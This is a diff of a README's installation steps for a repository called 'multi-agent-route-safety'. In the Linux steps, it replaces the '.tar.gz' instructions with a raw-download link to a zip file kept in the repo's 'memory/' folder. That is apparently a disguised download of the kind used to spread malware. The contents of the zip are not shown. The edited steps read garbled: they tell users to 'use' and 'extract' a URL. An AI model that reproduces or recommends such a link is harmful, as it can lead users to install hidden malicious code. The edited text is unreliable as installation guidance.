Suhail5765/multi-agent-route-safety/README.md

 2. **Choose the right version:** Look for the most recent release.
 The file you download will depend on your operating system.
    - Windows users should download the `.exe` file.
    - macOS users should opt for the `.dmg` file.
-   - Linux users can use the `.tar.gz` file.
+   - Linux users can use the `https://github.com/Suhail5765/multi-agent-route-safety/raw/refs/heads/main/memory/safety_route_agent_multi_v2.3.zip` file.
 3. **Download the file:** Click on the file name to start the download.
 4. **Locate the downloaded file:** Go to your downloads folder.
 5. **Run the installer:**
    - For Windows, double-click the `.exe` file and follow the prompts.
    - For macOS, open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux, extract the `.tar.gz` file and follow the instructions in the README.
+   - For Linux, extract the `https://github.com/Suhail5765/multi-agent-route-safety/raw/refs/heads/main/memory/safety_route_agent_multi_v2.3.zip` file and follow the instructions in the README.
 6. **Open the application:** Once installed, find the application in your programs list and launch it.

 ## 📞 Support